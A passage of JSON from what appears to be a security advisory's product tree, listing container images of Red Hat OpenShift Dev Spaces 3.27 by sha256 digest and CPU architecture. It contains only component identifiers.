"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64"
},
"product_reference": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64"
},
"product_reference": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x"
},
"product_reference": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64"
},
"product_reference": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64"
},
"product_reference": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x"
},
"product_reference": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64"
},
"product_reference": "registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
